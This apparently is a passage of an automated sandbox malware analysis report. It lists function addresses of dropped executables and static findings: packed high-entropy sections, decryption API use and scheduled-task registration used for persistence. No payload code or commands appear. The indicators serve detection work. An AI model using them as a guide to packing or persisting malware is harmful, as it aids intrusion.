Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F003A	7_2_061F003A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061FF830	7_2_061FF830
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061F0040	7_2_061F0040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061FA553	7_2_061FA553
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_061FA560	7_2_061FA560
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_063C001E	7_2_063C001E
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_063C0040	7_2_063C0040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06536BC8	7_2_06536BC8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06533570	7_2_06533570
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06536BB9	7_2_06536BB9
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06533560	7_2_06533560
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06630040	7_2_06630040
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_06630023	7_2_06630023
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe	Code function: 7_2_0664DD70	7_2_0664DD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 8_2_06E212E8	8_2_06E212E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 8_2_06E212F8	8_2_06E212F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 8_2_06E23FA8	8_2_06E23FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 8_2_06E23F45	8_2_06E23F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 8_2_06E248F0	8_2_06E248F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Code function: 8_2_06E24900	8_2_06E24900
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642F643	13_2_0642F643
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F6E38	13_2_063F6E38
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641DE56	13_2_0641DE56
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641CE5E	13_2_0641CE5E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641966D	13_2_0641966D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642EE75	13_2_0642EE75
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640D678	13_2_0640D678
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063DDE07	13_2_063DDE07
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F267F	13_2_063F267F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F1679	13_2_063F1679
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642D608	13_2_0642D608
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FD663	13_2_063FD663
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06418627	13_2_06418627
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640B636	13_2_0640B636
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064036CB	13_2_064036CB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F7EAF	13_2_063F7EAF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06408EE6	13_2_06408EE6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640EEEB	13_2_0640EEEB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641D6F5	13_2_0641D6F5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E56F7	13_2_063E56F7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642469E	13_2_0642469E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640469F	13_2_0640469F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064206A6	13_2_064206A6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F5ED5	13_2_063F5ED5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640CEBB	13_2_0640CEBB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641E747	13_2_0641E747
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642C75A	13_2_0642C75A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06426F5D	13_2_06426F5D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06400F65	13_2_06400F65
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063ECF19	13_2_063ECF19
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642D776	13_2_0642D776
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E7708	13_2_063E7708
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641677A	13_2_0641677A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FE702	13_2_063FE702
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640F70A	13_2_0640F70A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640970B	13_2_0640970B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06425F09	13_2_06425F09
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F076E	13_2_063F076E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EFF6C	13_2_063EFF6C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EAF63	13_2_063EAF63
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06419F20	13_2_06419F20
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06422F24	13_2_06422F24
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E9F4D	13_2_063E9F4D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FA745	13_2_063FA745
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642F7C3	13_2_0642F7C3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06410FC3	13_2_06410FC3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FCFB6	13_2_063FCFB6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640BFDD	13_2_0640BFDD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640D7E5	13_2_0640D7E5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06414FE9	13_2_06414FE9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641F7F4	13_2_0641F7F4
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E5FF8	13_2_063E5FF8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06413F86	13_2_06413F86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FF7ED	13_2_063FF7ED
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EA7EB	13_2_063EA7EB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06423F9C	13_2_06423F9C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EF43D	13_2_063EF43D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06429C41	13_2_06429C41
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06411451	13_2_06411451
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641EC56	13_2_0641EC56
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640DC67	13_2_0640DC67
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EA417	13_2_063EA417
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641440F	13_2_0641440F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641B415	13_2_0641B415
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FB469	13_2_063FB469
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641341A	13_2_0641341A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641C425	13_2_0641C425
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FF4AF	13_2_063FF4AF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064104D3	13_2_064104D3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E5C9B	13_2_063E5C9B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EB49B	13_2_063EB49B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EEC98	13_2_063EEC98
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06403CEB	13_2_06403CEB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F2C8B	13_2_063F2C8B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E6C85	13_2_063E6C85
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06424C93	13_2_06424C93
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064304A3	13_2_064304A3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642DCA0	13_2_0642DCA0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06409CA3	13_2_06409CA3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642E4AF	13_2_0642E4AF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064254B0	13_2_064254B0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642ECBA	13_2_0642ECBA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064294BE	13_2_064294BE
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FED3B	13_2_063FED3B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641A548	13_2_0641A548
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F3D24	13_2_063F3D24
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F551D	13_2_063F551D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06408504	13_2_06408504
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EFD57	13_2_063EFD57
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06427D33	13_2_06427D33
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E7D4A	13_2_063E7D4A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F1546	13_2_063F1546
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642CD39	13_2_0642CD39
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640AD3F	13_2_0640AD3F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06421D3D	13_2_06421D3D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06415DC5	13_2_06415DC5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06407DD3	13_2_06407DD3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640DDD7	13_2_0640DDD7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FBDA7	13_2_063FBDA7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641F5DD	13_2_0641F5DD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06418DE0	13_2_06418DE0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06426594	13_2_06426594
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642F24D	13_2_0642F24D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641625D	13_2_0641625D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EB20F	13_2_063EB20F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640BA79	13_2_0640BA79
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063ED27D	13_2_063ED27D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640E205	13_2_0640E205
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642A20C	13_2_0642A20C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E7267	13_2_063E7267
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E8A5A	13_2_063E8A5A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641D226	13_2_0641D226
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F5A49	13_2_063F5A49
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641B23C	13_2_0641B23C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064092C7	13_2_064092C7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640F2DF	13_2_0640F2DF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06408AE3	13_2_06408AE3
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640EAF6	13_2_0640EAF6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F02F9	13_2_063F02F9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F8AD8	13_2_063F8AD8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641DAAB	13_2_0641DAAB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F22CF	13_2_063F22CF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06412ABA	13_2_06412ABA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06401B46	13_2_06401B46
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063ECB33	13_2_063ECB33
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06414B50	13_2_06414B50
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06405363	13_2_06405363
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06419B66	13_2_06419B66
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641BB6D	13_2_0641BB6D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642731B	13_2_0642731B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EC34A	13_2_063EC34A
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E9B49	13_2_063E9B49
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641A3C6	13_2_0641A3C6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06413BCA	13_2_06413BCA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FA3A7	13_2_063FA3A7
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E9389	13_2_063E9389
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641CBF9	13_2_0641CBF9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FAB86	13_2_063FAB86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064173F8	13_2_064173F8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642C3FE	13_2_0642C3FE
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F73FF	13_2_063F73FF
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06422B86	13_2_06422B86
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064153AB	13_2_064153AB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EDBD5	13_2_063EDBD5
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064123B8	13_2_064123B8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642DBB8	13_2_0642DBB8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EE033	13_2_063EE033
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E981B	13_2_063E981B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06405065	13_2_06405065
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EC80F	13_2_063EC80F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063ED80F	13_2_063ED80F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FA00E	13_2_063FA00E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EF802	13_2_063EF802
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640C87D	13_2_0640C87D
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641C806	13_2_0641C806
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640580C	13_2_0640580C
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0643083B	13_2_0643083B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064228C6	13_2_064228C6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064218C9	13_2_064218C9
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064290F1	13_2_064290F1
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06429883	13_2_06429883
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642B883	13_2_0642B883
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F48F8	13_2_063F48F8
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06402888	13_2_06402888
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E88F2	13_2_063E88F2
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641008F	13_2_0641008F
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F28E2	13_2_063F28E2
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641709E	13_2_0641709E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064068A0	13_2_064068A0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EF0DD	13_2_063EF0DD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641B8A6	13_2_0641B8A6
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641F0BB	13_2_0641F0BB
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064210BD	13_2_064210BD
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06404147	13_2_06404147
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06428149	13_2_06428149
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640214E	13_2_0640214E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06410950	13_2_06410950
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640B158	13_2_0640B158
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0640A95E	13_2_0640A95E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063EE91E	13_2_063EE91E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06419165	13_2_06419165
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06420173	13_2_06420173
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0642D173	13_2_0642D173
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063FD161	13_2_063FD161
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06403927	13_2_06403927
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F2157	13_2_063F2157
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F114B	13_2_063F114B
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064081D0	13_2_064081D0
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_064349DA	13_2_064349DA
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_0641A9E4	13_2_0641A9E4
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063E698E	13_2_063E698E
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_063F3187	13_2_063F3187
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe	Code function: 13_2_06407998	13_2_06407998

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 1148

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SxQyhJr[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SxQyhJr.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9978499659400545
Source: file.exe	Static PE information: Section: egarwnqv ZLIB complexity 0.99483142788319
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9978499659400545
Source: skotes.exe.0.dr	Static PE information: Section: egarwnqv ZLIB complexity 0.99483142788319
Source: random[2].exe.6.dr	Static PE information: Section: jyijtabb ZLIB complexity 0.9941472364245416
Source: 98a7b9f337.exe.6.dr	Static PE information: Section: jyijtabb ZLIB complexity 0.9941472364245416
Source: random[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: random[1].exe.6.dr	Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: a6f0d09f38.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9975065104166667
Source: a6f0d09f38.exe.6.dr	Static PE information: Section: bioduybg ZLIB complexity 0.9947613765105741
Source: random[1].exe0.6.dr	Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432
Source: b5da647ae3.exe.6.dr	Static PE information: Section: sqwnkuay ZLIB complexity 0.9946332324276432

Source: random[1].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: a6f0d09f38.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FieldCalculator.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.SxQyhJr.exe.4108370.1.raw.unpack, FilteredInspector.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.SxQyhJr.exe.6350000.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

